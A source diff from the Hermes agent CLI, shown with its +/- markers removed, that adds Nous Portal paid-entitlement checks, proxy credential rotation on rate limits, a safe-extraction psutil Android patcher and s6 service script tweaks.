def format_nous_portal_entitlement_message(
account_info: Optional[NousPortalAccountInfo],
*,
capability: str = "this feature",
include_refresh_hint: bool = True,
) -> Optional[str]:
"""Return user-facing guidance for a missing Nous paid entitlement.
``None`` means the account is known to have paid service access. The
message intentionally works from normalized entitlement fields rather than
subscription price alone: purchased credits without a subscription still
count as paid access, while a paid subscription with exhausted usable
credits does not.
"""
billing_url = nous_portal_billing_url(account_info)
if account_info is not None and account_info.paid_service_access is True:
return None
if account_info is None:
return (
f"Hermes could not verify your Nous Portal entitlement, so {capability} "
f"is unavailable. Run `hermes model` to refresh your login, or check "
f"billing at {billing_url}."
)
if not account_info.logged_in:
if account_info.inference_credential_present:
return (
f"Nous inference credentials are configured, but Hermes cannot verify "
f"your Nous Portal paid access for {capability}. Log in with "
f"`hermes model` to enable Portal-managed features. Billing and "
f"credits are managed at {billing_url}."
)
return (
f"Log in to Nous Portal to use {capability}: run `hermes model`. "
f"Billing and credits are managed at {billing_url}."
)
if account_info.paid_service_access is None:
detail = (
f"Hermes could not verify your Nous Portal paid access, so {capability} "
f"is unavailable."
)
if account_info.error:
detail += f" Account lookup failed: {account_info.error}."
if include_refresh_hint:
detail += " Run `hermes model` to refresh your session."
detail += f" Check billing at {billing_url}."
return detail
access = account_info.paid_service_access_info
reason = access.reason if access else None
if reason == "account_missing":
return (
f"Hermes could not find a Nous Portal account or organisation for this "
f"login, so {capability} is unavailable. Run `hermes model` to "
f"authenticate again; if the problem persists, contact Nous support."
)
if reason == "no_usable_credits" or account_info.paid_service_access is False:
message = _no_paid_access_message(account_info, capability, billing_url)
if include_refresh_hint and not account_info.fresh:
message += " If you recently bought credits, run `hermes model` to refresh Hermes."
return message
return (
f"Your Nous Portal account does not currently have paid service access, "
f"so {capability} is unavailable. Add credits or update billing at {billing_url}."
)
def _no_paid_access_message(
account_info: NousPortalAccountInfo,
capability: str,
billing_url: str,
) -> str:
access = account_info.paid_service_access_info
has_active_subscription = access.has_active_subscription if access else None
active_subscription_is_paid = access.active_subscription_is_paid if access else None
total_usable = access.total_usable_credits if access else None
subscription_credits = access.subscription_credits_remaining if access else None
purchased_credits = access.purchased_credits_remaining if access else None
if has_active_subscription and active_subscription_is_paid:
credit_detail = _credit_detail(total_usable, subscription_credits, purchased_credits)
return (
f"Your Nous Portal credits are exhausted{credit_detail}, so {capability} "
f"is unavailable. Top up or renew credits at {billing_url}."
)
if has_active_subscription and active_subscription_is_paid is False:
return (
f"Your current Nous Portal plan does not include paid service access, "
f"so {capability} is unavailable. Upgrade or add credits at {billing_url}."
)
if has_active_subscription is False:
credit_detail = _credit_detail(total_usable, subscription_credits, purchased_credits)
return (
f"Your Nous Portal account has no active subscription or usable credits"
f"{credit_detail}, so {capability} is unavailable. Subscribe or add credits "
f"at {billing_url}."
)
credit_detail = _credit_detail(total_usable, subscription_credits, purchased_credits)
return (
f"Your Nous Portal account has no usable paid credits{credit_detail}, so "
f"{capability} is unavailable. Add credits or update billing at {billing_url}."
)
def _credit_detail(
total_usable: Optional[float],
subscription_credits: Optional[float],
purchased_credits: Optional[float],
) -> str:
parts: list[str] = []
if total_usable is not None:
parts.append(f"usable ${total_usable:.2f}")
if subscription_credits is not None:
parts.append(f"subscription ${subscription_credits:.2f}")
if purchased_credits is not None:
parts.append(f"purchased ${purchased_credits:.2f}")
if not parts:
return ""
return f" ({', '.join(parts)})"
def reset_nous_portal_account_info_cache() -> None:
"""Clear the short-lived account-info cache used by tests."""
global _account_info_cache
_account_info_cache = None
def get_nous_portal_account_info(
*,
force_fresh: bool = False,
min_jwt_ttl_seconds: int = 60,
) -> NousPortalAccountInfo:
"""Return normalized Nous Portal account entitlement information.
By default, a valid unexpired OAuth access JWT is used as a low-latency
local account snapshot. ``force_fresh=True`` always calls
``/api/oauth/account`` and bypasses the short-lived cache. JWT claims are
decoded locally for UX gating only; server APIs remain authoritative.
"""
try:
from hermes_cli.auth import get_provider_auth_state
state = get_provider_auth_state("nous") or {}
except Exception as exc:
return _error_info(error=exc, logged_in=False)
access_token = state.get("access_token")
portal_base_url = _portal_base_url(state)
if not isinstance(access_token, str) or not access_token.strip():
pool_oauth_info = _info_from_oauth_pool(
force_fresh=force_fresh,
min_jwt_ttl_seconds=min_jwt_ttl_seconds,
portal_base_url=portal_base_url,
)
if pool_oauth_info is not None:
return pool_oauth_info
pool_info = _info_from_inference_key_pool(portal_base_url)
if pool_info is not None:
return pool_info
return NousPortalAccountInfo(
logged_in=False,
source="none",
fresh=False,
portal_base_url=portal_base_url,
)
if not force_fresh:
jwt_info = _info_from_valid_jwt(
access_token,
state=state,
portal_base_url=portal_base_url,
min_jwt_ttl_seconds=min_jwt_ttl_seconds,
)
if jwt_info is not None:
return jwt_info
return _fresh_account_info(
state=state,
force_fresh=force_fresh,
portal_base_url=portal_base_url,
)
def _fresh_account_info(
*,
state: dict[str, Any],
force_fresh: bool,
portal_base_url: Optional[str],
) -> NousPortalAccountInfo:
global _account_info_cache
try:
from hermes_cli.auth import get_provider_auth_state, resolve_nous_access_token
access_token = resolve_nous_access_token()
refreshed_state = get_provider_auth_state("nous") or state
portal_base_url = _portal_base_url(refreshed_state) or portal_base_url
cache_key = _cache_key(access_token, portal_base_url)
if not force_fresh and _account_info_cache is not None:
cached_key, cached_at, cached_info = _account_info_cache
if cached_key == cache_key and (time.monotonic() - cached_at) < _ACCOUNT_INFO_CACHE_TTL:
return cached_info
payload = _fetch_nous_account_info(access_token, portal_base_url)
if not payload:
return _error_info(
error="empty_account_response",
logged_in=True,
portal_base_url=portal_base_url,
)
if isinstance(payload.get("error"), str):
return _error_info(
error=payload.get("error") or "account_response_error",
logged_in=True,
portal_base_url=portal_base_url,
raw_account=payload,
)
info = _info_from_account_payload(
payload,
state=refreshed_state,
portal_base_url=portal_base_url,
)
_account_info_cache = (cache_key, time.monotonic(), info)
return info
except Exception as exc:
return _error_info(
error=exc,
logged_in=bool(state.get("access_token")),
portal_base_url=portal_base_url,
)
def _info_from_inference_key_pool(
portal_base_url: Optional[str],
) -> Optional[NousPortalAccountInfo]:
"""Return an explicit unknown-entitlement snapshot for opaque Nous keys."""
try:
entry = _select_nous_pool_entry()
if entry is None:
return None
runtime_key = getattr(entry, "runtime_api_key", None) or getattr(entry, "access_token", "")
if not isinstance(runtime_key, str) or not runtime_key.strip():
return None
return NousPortalAccountInfo(
logged_in=False,
source="inference_key",
fresh=False,
portal_base_url=(
getattr(entry, "portal_base_url", None)
or portal_base_url
),
inference_base_url=(
getattr(entry, "inference_base_url", None)
or getattr(entry, "runtime_base_url", None)
or getattr(entry, "base_url", None)
),
inference_credential_present=True,
credential_source=f"pool:{getattr(entry, 'label', 'unknown')}",
error="portal_oauth_missing",
)
except Exception:
return None
def _info_from_oauth_pool(
*,
force_fresh: bool,
min_jwt_ttl_seconds: int,
portal_base_url: Optional[str],
) -> Optional[NousPortalAccountInfo]:
try:
entry = _select_nous_pool_entry()
except Exception:
return None
if entry is None or not _pool_entry_is_portal_oauth(entry):
return None
access_token = getattr(entry, "access_token", None)
if not isinstance(access_token, str) or not access_token.strip():
return None
entry_portal_url = (
getattr(entry, "portal_base_url", None)
or portal_base_url
)
state = {
"access_token": access_token,
"client_id": getattr(entry, "client_id", None),
"inference_base_url": (
getattr(entry, "inference_base_url", None)
or getattr(entry, "runtime_base_url", None)
or getattr(entry, "base_url", None)
),
"agent_key": getattr(entry, "agent_key", None),
"credential_source": f"pool:{getattr(entry, 'label', 'unknown')}",
}
if not force_fresh:
jwt_info = _info_from_valid_jwt(
access_token,
state=state,
portal_base_url=entry_portal_url,
min_jwt_ttl_seconds=min_jwt_ttl_seconds,
)
if jwt_info is not None:
return jwt_info
try:
payload = _fetch_nous_account_info(access_token, entry_portal_url)
except Exception as exc:
return _error_info(
error=exc,
logged_in=True,
portal_base_url=entry_portal_url,
)
if not payload:
return _error_info(
error="empty_account_response",
logged_in=True,
portal_base_url=entry_portal_url,
)
if isinstance(payload.get("error"), str):
return _error_info(
error=payload.get("error") or "account_response_error",
logged_in=True,
portal_base_url=entry_portal_url,
raw_account=payload,
)
return _info_from_account_payload(
payload,
state=state,
portal_base_url=entry_portal_url,
)
def _select_nous_pool_entry() -> Optional[Any]:
from agent.credential_pool import load_pool
pool = load_pool("nous")
if not pool or not pool.has_credentials():
return None
entries = list(pool.entries())
if not entries:
return None
def _entry_sort_key(entry: Any) -> tuple[float, float, int]:
agent_exp = _parse_iso_timestamp(getattr(entry, "agent_key_expires_at", None)) or 0.0
access_exp = _parse_iso_timestamp(getattr(entry, "expires_at", None)) or 0.0
priority = int(getattr(entry, "priority", 0) or 0)
return (agent_exp, access_exp, -priority)
return max(entries, key=_entry_sort_key)
def _pool_entry_is_portal_oauth(entry: Any) -> bool:
access_token = getattr(entry, "access_token", None)
if not isinstance(access_token, str) or not access_token.strip():
return False
auth_type = str(getattr(entry, "auth_type", "") or "").strip().lower()
refresh_token = getattr(entry, "refresh_token", None)
return auth_type.startswith("oauth") or bool(refresh_token)
def _fetch_nous_account_info(
access_token: str,
portal_base_url: Optional[str] = None,
) -> dict[str, Any]:
base = (portal_base_url or "https://portal.nousresearch.com").rstrip("/")
url = f"{base}/api/oauth/account"
headers = {
"Authorization": f"Bearer {access_token}",
"Accept": "application/json",
}
req = urllib.request.Request(url, headers=headers)
with urllib.request.urlopen(req, timeout=8) as resp:
payload = json.loads(resp.read().decode())
return payload if isinstance(payload, dict) else {}
def _info_from_valid_jwt(
token: str,
*,
state: dict[str, Any],
portal_base_url: Optional[str],
min_jwt_ttl_seconds: int,
) -> Optional[NousPortalAccountInfo]:
try:
from hermes_cli.auth import _decode_jwt_claims
except Exception:
return None
claims = _decode_jwt_claims(token)
if not claims:
return None
exp = _coerce_float(claims.get("exp"))
if exp is None or exp <= time.time() + max(0, int(min_jwt_ttl_seconds)):
return None
paid_access = _coerce_bool(claims.get("paid_access"))
subscription_tier = _coerce_int(claims.get("subscription_tier"))
access_info = NousPaidServiceAccessInfo(
allowed=paid_access,
paid_access=paid_access,
organisation_id=_coerce_str(claims.get("org_id")),
subscription_tier=subscription_tier,
)
return NousPortalAccountInfo(
logged_in=True,
source="jwt",
fresh=False,
user_id=_coerce_str(claims.get("sub")),
org_id=_coerce_str(claims.get("org_id")),
client_id=_coerce_str(claims.get("client_id") or state.get("client_id")),
product_id=_coerce_str(claims.get("product_id")),
nous_client=_coerce_str(claims.get("nous_client")),
portal_base_url=portal_base_url,
inference_base_url=_coerce_str(state.get("inference_base_url")),
inference_credential_present=True,
credential_source=_coerce_str(state.get("credential_source")) or "auth_store",
expires_at=datetime.fromtimestamp(exp, tz=timezone.utc),
paid_service_access=paid_access,
paid_service_access_info=access_info,
raw_claims=dict(claims),
)
def _info_from_account_payload(
payload: dict[str, Any],
*,
state: dict[str, Any],
portal_base_url: Optional[str],
) -> NousPortalAccountInfo:
user = payload.get("user") if isinstance(payload.get("user"), dict) else {}
organisation = (
payload.get("organisation")
if isinstance(payload.get("organisation"), dict)
else {}
)
subscription = _subscription_from_payload(payload.get("subscription"))
access = _paid_service_access_from_payload(payload.get("paid_service_access"))
paid_access = access.allowed if access else None
if paid_access is None and access is not None:
paid_access = access.paid_access
return NousPortalAccountInfo(
logged_in=True,
source="account_api",
fresh=True,
org_id=_coerce_str(organisation.get("id")) or (access.organisation_id if access else None),
client_id=_coerce_str(state.get("client_id")),
portal_base_url=portal_base_url,
inference_base_url=_coerce_str(state.get("inference_base_url")),
inference_credential_present=bool(state.get("access_token") or state.get("agent_key")),
credential_source=_coerce_str(state.get("credential_source")) or "auth_store",
email=_coerce_str(user.get("email")),
privy_did=_coerce_str(user.get("privy_did")),
subscription=subscription,
paid_service_access=paid_access,
paid_service_access_info=access,
raw_account=dict(payload),
)
def _subscription_from_payload(value: Any) -> Optional[NousPortalSubscriptionInfo]:
if not isinstance(value, dict):
return None
return NousPortalSubscriptionInfo(
plan=_coerce_str(value.get("plan")),
tier=_coerce_int(value.get("tier")),
monthly_charge=_coerce_float(value.get("monthly_charge")),
current_period_end=_coerce_str(value.get("current_period_end")),
credits_remaining=_coerce_float(value.get("credits_remaining")),
rollover_credits=_coerce_float(value.get("rollover_credits")),
)
def _paid_service_access_from_payload(value: Any) -> Optional[NousPaidServiceAccessInfo]:
if not isinstance(value, dict):
return None
allowed = _coerce_bool(value.get("allowed"))
paid_access = _coerce_bool(value.get("paid_access"))
return NousPaidServiceAccessInfo(
allowed=allowed,
paid_access=paid_access,
reason=_coerce_str(value.get("reason")),
organisation_id=_coerce_str(value.get("organisation_id")),
effective_at_ms=_coerce_int(value.get("effective_at_ms")),
has_active_subscription=_coerce_bool(value.get("has_active_subscription")),
active_subscription_is_paid=_coerce_bool(value.get("active_subscription_is_paid")),
subscription_tier=_coerce_int(value.get("subscription_tier")),
subscription_monthly_charge=_coerce_float(value.get("subscription_monthly_charge")),
subscription_credits_remaining=_coerce_float(value.get("subscription_credits_remaining")),
purchased_credits_remaining=_coerce_float(value.get("purchased_credits_remaining")),
total_usable_credits=_coerce_float(value.get("total_usable_credits")),
)
def _error_info(
*,
error: object,
logged_in: bool,
portal_base_url: Optional[str] = None,
raw_account: Optional[dict[str, Any]] = None,
) -> NousPortalAccountInfo:
return NousPortalAccountInfo(
logged_in=logged_in,
source="error",
fresh=False,
portal_base_url=portal_base_url,
raw_account=raw_account,
error=str(error),
)
def _portal_base_url(state: dict[str, Any]) -> Optional[str]:
value = state.get("portal_base_url")
if not isinstance(value, str) or not value.strip():
return None
return value.strip().rstrip("/")
def _cache_key(access_token: str, portal_base_url: Optional[str]) -> str:
digest = hashlib.sha256(access_token.encode("utf-8")).hexdigest()
return f"{portal_base_url or ''}:{digest}"
def _parse_iso_timestamp(value: Any) -> Optional[float]:
if not isinstance(value, str) or not value:
return None
text = value.strip()
if text.endswith("Z"):
text = text[:-1] + "+00:00"
try:
return datetime.fromisoformat(text).timestamp()
except Exception:
return None
def _coerce_str(value: Any) -> Optional[str]:
if isinstance(value, str) and value:
return value
return None
def _coerce_bool(value: Any) -> Optional[bool]:
return value if isinstance(value, bool) else None
def _coerce_int(value: Any) -> Optional[int]:
if isinstance(value, bool):
return None
try:
if value is None:
return None
return int(value)
except (TypeError, ValueError):
return None
def _coerce_float(value: Any) -> Optional[float]:
if isinstance(value, bool):
return None
try:
if value is None:
return None
return float(value)
except (TypeError, ValueError):
return None
+40 -11
View File
@@ -6,8 +6,8 @@ from dataclasses import dataclass
from pathlib import Path
from typing import Dict, Iterable, Optional, Set
from hermes_cli.auth import get_nous_auth_status
from hermes_cli.config import get_env_value, load_config
from hermes_cli.nous_account import NousPortalAccountInfo, get_nous_portal_account_info
from tools.managed_tool_gateway import is_managed_tool_gateway_ready
from utils import is_truthy_value
from tools.tool_backend_helpers import (
@@ -53,6 +53,7 @@ class NousSubscriptionFeatures:
nous_auth_present: bool
provider_is_nous: bool
features: Dict[str, NousFeatureState]
account_info: Optional[NousPortalAccountInfo] = None
@property
def web(self) -> NousFeatureState:
@@ -227,6 +228,8 @@ def _resolve_browser_feature_state(
def get_nous_subscription_features(
config: Optional[Dict[str, object]] = None,
*,
force_fresh: bool = False,
) -> NousSubscriptionFeatures:
if config is None:
config = load_config() or {}
@@ -235,12 +238,19 @@ def get_nous_subscription_features(
provider_is_nous = str(model_cfg.get("provider") or "").strip().lower() == "nous"
try:
nous_status = get_nous_auth_status()
if force_fresh:
account_info = get_nous_portal_account_info(force_fresh=True)
else:
account_info = get_nous_portal_account_info()
except Exception:
nous_status = {}
account_info = None
managed_tools_flag = managed_nous_tools_enabled()
nous_auth_present = bool(nous_status.get("logged_in"))
managed_tools_flag = bool(
account_info
and account_info.logged_in
and account_info.paid_service_access is True
)
nous_auth_present = bool(account_info and account_info.logged_in)
subscribed = provider_is_nous or nous_auth_present
web_tool_enabled = _toolset_enabled(config, "web")
@@ -317,6 +327,7 @@ def get_nous_subscription_features(
modal_mode,
has_direct=direct_modal,
managed_ready=managed_modal_available,
managed_enabled=managed_tools_flag,
)
web_managed = web_backend == "firecrawl" and managed_web_available and not direct_firecrawl
@@ -483,6 +494,7 @@ def get_nous_subscription_features(
nous_auth_present=nous_auth_present,
provider_is_nous=provider_is_nous,
features=features,
account_info=account_info,
)
@@ -493,11 +505,15 @@ def apply_nous_managed_defaults(
config: Dict[str, object],
*,
enabled_toolsets: Optional[Iterable[str]] = None,
force_fresh: bool = False,
) -> set[str]:
if not managed_nous_tools_enabled():
features = get_nous_subscription_features(config, force_fresh=force_fresh)
if not (
features.account_info
and features.account_info.logged_in
and features.account_info.paid_service_access is True
):
return set()
features = get_nous_subscription_features(config)
if not features.provider_is_nous:
return set()
@@ -594,6 +610,8 @@ _ALL_GATEWAY_KEYS = ("web", "image_gen", "tts", "browser")
def get_gateway_eligible_tools(
config: Optional[Dict[str, object]] = None,
*,
force_fresh: bool = False,
) -> tuple[list[str], list[str], list[str]]:
"""Return (unconfigured, has_direct, already_managed) tool key lists.
@@ -604,7 +622,11 @@ def get_gateway_eligible_tools(
All lists are empty when the user is not a paid Nous subscriber or
is not using Nous as their provider.
"""
if not managed_nous_tools_enabled():
if force_fresh:
managed_enabled = managed_nous_tools_enabled(force_fresh=True)
else:
managed_enabled = managed_nous_tools_enabled()
if not managed_enabled:
return [], [], []
if config is None:
@@ -695,7 +717,11 @@ def apply_gateway_defaults(
return changed
def prompt_enable_tool_gateway(config: Dict[str, object]) -> set[str]:
def prompt_enable_tool_gateway(
config: Dict[str, object],
*,
force_fresh: bool = True,
) -> set[str]:
"""If eligible tools exist, prompt the user to enable the Tool Gateway.
Uses prompt_choice() with a description parameter so the curses TUI
@@ -704,7 +730,10 @@ def prompt_enable_tool_gateway(config: Dict[str, object]) -> set[str]:
Returns the set of tools that were enabled, or empty set if the user
declined or no tools were eligible.
"""
unconfigured, has_direct, already_managed = get_gateway_eligible_tools(config)
unconfigured, has_direct, already_managed = get_gateway_eligible_tools(
config,
force_fresh=force_fresh,
)
if not unconfigured and not has_direct:
return set()
+40
View File
@@ -553,6 +553,46 @@ class PluginContext:
self.manifest.name, provider.name,
)
# -- dashboard auth provider registration --------------------------------
def register_dashboard_auth_provider(self, provider) -> None:
"""Register a dashboard authentication provider.
``provider`` must be an instance of
:class:`hermes_cli.dashboard_auth.DashboardAuthProvider`. Used by
the dashboard OAuth auth gate, which engages when the dashboard
binds to a non-loopback host without ``--insecure``.
Misbehaving providers (wrong type, duplicate name) are logged at
WARNING and silently ignored never raised so a broken plugin
cannot crash the host. Same convention as
``register_image_gen_provider``.
"""
from hermes_cli.dashboard_auth import (
DashboardAuthProvider, register_provider,
)
if not isinstance(provider, DashboardAuthProvider):
logger.warning(
"Plugin '%s' tried to register a dashboard-auth provider "
"that does not inherit from DashboardAuthProvider. Ignoring.",
self.manifest.name,
)
return
try:
register_provider(provider)
except (TypeError, ValueError) as e:
logger.warning(
"Plugin '%s' failed to register dashboard-auth provider "
"%r: %s",
self.manifest.name, getattr(provider, "name", "?"), e,
)
return
logger.info(
"Plugin '%s' registered dashboard-auth provider: %s (%s)",
self.manifest.name, provider.name, provider.display_name,
)
# -- video gen provider registration -------------------------------------
def register_video_gen_provider(self, provider) -> None:
+26 -3
View File
@@ -864,12 +864,35 @@ def _discover_memory_providers() -> list[tuple[str, str]]:
def _discover_context_engines() -> list[tuple[str, str]]:
"""Return [(name, description), ...] for available context engines."""
"""Return [(name, description), ...] for available context engines.
Includes repo-shipped engines from ``plugins/context_engine/`` AND
plugin-registered engines (third-party engines installed as Hermes
plugins via ``ctx.register_context_engine``). Repo-shipped descriptions
win when a plugin-registered engine collides on name.
"""
engines: list[tuple[str, str]] = []
seen: set[str] = set()
try:
from plugins.context_engine import discover_context_engines
return [(name, desc) for name, desc, _avail in discover_context_engines()]
for name, desc, _avail in discover_context_engines():
if name not in seen:
engines.append((name, desc))
seen.add(name)
except Exception:
return []
pass
try:
from hermes_cli.plugins import discover_plugins, get_plugin_context_engine
discover_plugins()
plugin_engine = get_plugin_context_engine()
if plugin_engine and getattr(plugin_engine, "name", None) and plugin_engine.name not in seen:
engines.append((plugin_engine.name, "installed plugin"))
except Exception:
pass
return engines
def _get_current_memory_provider() -> str:
-9
View File
@@ -143,10 +143,6 @@ HERMES_OVERLAYS: Dict[str, HermesOverlay] = {
transport="openai_chat",
base_url_env_var="ALIBABA_CODING_PLAN_BASE_URL",
),
"vercel": HermesOverlay(
transport="openai_chat",
is_aggregator=True,
),
"opencode": HermesOverlay(
transport="openai_chat",
is_aggregator=True,
@@ -290,11 +286,6 @@ ALIASES: Dict[str, str] = {
"github": "github-copilot",
"github-copilot-acp": "copilot-acp",
# vercel (models.dev ID for AI Gateway)
"ai-gateway": "vercel",
"aigateway": "vercel",
"vercel-ai-gateway": "vercel",
# opencode (models.dev ID for OpenCode Zen)
"opencode-zen": "opencode",
"zen": "opencode",
+2 -2
View File
@@ -104,7 +104,7 @@ class NousPortalAdapter(UpstreamAdapter):
state = self._read_state()
if state is None:
raise RuntimeError(
"Not logged into Nous Portal. Run `hermes login nous` first."
"Not logged into Nous Portal. Run `hermes auth add nous` first."
)
try:
@@ -135,7 +135,7 @@ class NousPortalAdapter(UpstreamAdapter):
if not agent_key:
raise RuntimeError(
"Nous Portal refresh did not return a usable agent_key. "
"Try `hermes login nous` to re-authenticate."
"Try `hermes auth add nous` to re-authenticate."
)
base_url = (
+13 -4
View File
@@ -79,7 +79,7 @@ class XAIGrokAdapter(UpstreamAdapter):
failed_credential: UpstreamCredential,
status_code: int,
) -> Optional[UpstreamCredential]:
if status_code != 401:
if status_code not in {401, 429}:
return None
with self._lock:
@@ -87,16 +87,25 @@ class XAIGrokAdapter(UpstreamAdapter):
if pool is None:
return None
refreshed = pool.try_refresh_current()
if refreshed is None:
if status_code == 429:
# Mark the rate-limited key with its 1-hour cooldown and rotate
# to the next available credential. Returns None when the pool
# has no other key to offer — the 429 will flow back to the client.
refreshed = pool.mark_exhausted_and_rotate(status_code=status_code)
else:
refreshed = pool.try_refresh_current()
if refreshed is None:
refreshed = pool.mark_exhausted_and_rotate(status_code=status_code)
if refreshed is None:
return None
retry_cred = self._credential_from_entry(refreshed)
if retry_cred.bearer == failed_credential.bearer:
return None
logger.info("proxy: xAI upstream rejected bearer; retrying with refreshed pool credential")
logger.info(
"proxy: xAI upstream returned %s; retrying with rotated pool credential",
status_code,
)
return retry_cred
def _load_pool(self) -> Optional[CredentialPool]:
+1 -1
View File
@@ -44,7 +44,7 @@ def cmd_proxy_start(args: Any) -> int:
return 2
if not adapter.is_authenticated():
auth_hint = getattr(adapter, "auth_hint", f"hermes login {adapter.name}")
auth_hint = getattr(adapter, "auth_hint", f"hermes auth add {adapter.name}")
print(
f"Not logged into {adapter.display_name}. "
f"Run `{auth_hint}` first.",
+1 -1
View File
@@ -206,7 +206,7 @@ def create_app(adapter: UpstreamAdapter) -> "web.Application":
return session_or_response
session = session_or_response
if upstream_resp.status == 401:
if upstream_resp.status in {401, 429}:
try:
retry_cred = adapter.get_retry_credential(
failed_credential=cred,
+108
View File
@@ -0,0 +1,108 @@
"""Helpers for the temporary psutil-on-Android compatibility installer."""
from __future__ import annotations
import shutil
import tarfile
from pathlib import Path, PurePosixPath
# Pin a version we know patches cleanly. Update when a newer psutil
# changes the marker line shape and we need to follow upstream.
PSUTIL_URL = (
"https://files.pythonhosted.org/packages/aa/c6/"
"d1ddf4abb55e93cebc4f2ed8b5d6dbad109ecb8d63748dd2b20ab5e57ebe/"
"psutil-7.2.2.tar.gz"
)
MARKER = 'LINUX = sys.platform.startswith("linux")'
REPLACEMENT = 'LINUX = sys.platform.startswith(("linux", "android"))'
class PsutilAndroidInstallError(RuntimeError):
"""Raised when the pinned psutil sdist is missing or unsafe."""
def _normalize_member_parts(member_name: str) -> tuple[str, ...]:
path = PurePosixPath(member_name)
parts = tuple(part for part in path.parts if part not in ("", "."))
if path.is_absolute() or ".." in parts or not parts:
raise PsutilAndroidInstallError(
f"Unsafe archive member path: {member_name!r}"
)
return parts
def _safe_extract_tar_gz(archive: Path, destination: Path) -> None:
"""Extract a tar.gz without allowing traversal or link members."""
with tarfile.open(archive, "r:gz") as tf:
for member in tf.getmembers():
parts = _normalize_member_parts(member.name)
target = destination.joinpath(*parts)
if member.isdir():
target.mkdir(parents=True, exist_ok=True)
continue
if not member.isfile():
raise PsutilAndroidInstallError(
f"Unsupported archive member type: {member.name}"
)
target.parent.mkdir(parents=True, exist_ok=True)
extracted = tf.extractfile(member)
if extracted is None:
raise PsutilAndroidInstallError(
f"Cannot read archive member: {member.name}"
)
with extracted, open(target, "wb") as dst:
shutil.copyfileobj(extracted, dst)
try:
target.chmod(member.mode & 0o777)
except OSError:
pass
def prepare_patched_psutil_sdist(archive: Path, destination: Path) -> Path:
"""Safely extract the pinned psutil sdist and patch it for Android."""
_safe_extract_tar_gz(archive, destination)
src_roots = sorted(
(
path for path in destination.iterdir()
if path.is_dir() and path.name.startswith("psutil-")
),
key=lambda path: path.name,
)
if not src_roots:
raise PsutilAndroidInstallError(
"psutil sdist did not contain a psutil-* directory"
)
src_root = src_roots[0]
common_py = src_root / "psutil" / "_common.py"
if not common_py.is_file():
raise PsutilAndroidInstallError(
f"psutil sdist did not contain {common_py.relative_to(src_root)!s}"
)
try:
content = common_py.read_text(encoding="utf-8")
except OSError as exc:
raise PsutilAndroidInstallError(
f"Failed to read {common_py.relative_to(src_root)!s}"
) from exc
if MARKER not in content:
raise PsutilAndroidInstallError(
"psutil Android compatibility patch marker not found"
)
try:
common_py.write_text(
content.replace(MARKER, REPLACEMENT),
encoding="utf-8",
)
except OSError as exc:
raise PsutilAndroidInstallError(
f"Failed to write {common_py.relative_to(src_root)!s}"
) from exc
return src_root
+47 -3
View File
@@ -566,8 +566,11 @@ class S6ServiceManager:
1. Sources HERMES_HOME (and any extra env) via with-contenv
so e.g. ``-e HERMES_HOME=/data/hermes`` is honored at run
time, not Python-substituted at registration time (OQ8-C).
2. Activates the bundled venv.
3. Drops to the hermes user and exec's
2. Resets ``HOME`` to ``/opt/data`` before the privilege drop
so with-contenv's root HOME does not leak into the
unprivileged gateway process.
3. Activates the bundled venv.
4. Drops to the hermes user and exec's
``hermes -p <profile> gateway run`` (or just ``hermes
gateway run`` for the default profile see below).
@@ -597,11 +600,20 @@ class S6ServiceManager:
"#!/command/with-contenv sh",
"# shellcheck shell=sh",
"set -e",
"export HOME=/opt/data",
"cd /opt/data",
". /opt/hermes/.venv/bin/activate",
]
for k, v in sorted(extra_env.items()):
lines.append(f"export {k}={shlex.quote(v)}")
# Sentinel for the supervised-child path. Prevents recursive
# redirect when the supervised gateway re-enters
# `_gateway_command_inner` with subcmd == "run" — without it the
# supervisor would dispatch `gateway start` which would re-exec
# `gateway run --replace` which would re-dispatch `gateway
# start`, etc. See `_gateway_command_inner` for the matching
# guard.
lines.append("export HERMES_S6_SUPERVISED_CHILD=1")
if profile == "default":
lines.append("exec s6-setuidgid hermes hermes gateway run")
else:
@@ -620,6 +632,38 @@ class S6ServiceManager:
so a container started with ``-e HERMES_HOME=/data/hermes``
gets its logs under /data/hermes/logs/..., not the build-time
default.
Output routing the script is two action directives, applied
per line, in order:
1. ``1`` (forward to stdout) propagates the line up the
s6-supervise pipeline to /init's stdout, which is the
container's stdout, which is ``docker logs``. Without
this, supervised stdout would be terminated inside
s6-log and never reach the container's log stream;
users would have to ``docker exec`` and ``tail`` the
file just to see startup banners. (Python's ``logging``
module defaults to stderr, which s6-supervise leaves
unfiltered so warnings/errors already reach docker
logs. This change is specifically about the rich-console
banner output and other plain stdout writes.)
2. ``T <log_dir>`` also write a timestamped copy to the
rotated log directory (``current`` + archived ``@*.s``
files). This is what ``hermes logs`` reads and what
persists across container restarts via the volume mount.
``T`` is non-sticky: it only prefixes lines for the next
action directive. We deliberately put ``T`` between ``1``
and the log dir (not before ``1``) so:
* ``docker logs`` shows raw lines Python's logging
formatter has its own timestamps, and ``docker logs
--timestamps`` adds a third layer when desired. No
double-stamping in the most common reading path.
* The persisted file gets s6-log's own ISO 8601 timestamp
so even output that lacked a Python-logger timestamp
(rich banners, third-party libs' raw prints) is
correlatable in ``current``.
"""
import shlex
prof = shlex.quote(profile)
@@ -630,7 +674,7 @@ class S6ServiceManager:
f'log_dir="$HERMES_HOME/logs/gateways/{prof}"\n'
f'mkdir -p "$log_dir"\n'
f'chown -R hermes:hermes "$log_dir" 2>/dev/null || true\n'
f'exec s6-setuidgid hermes s6-log n10 s1000000 T "$log_dir"\n'
f'exec s6-setuidgid hermes s6-log 1 n10 s1000000 T "$log_dir"\n'
)
# -- lifecycle ---------------------------------------------------------

Some files were not shown because too many files have changed in this diff Show More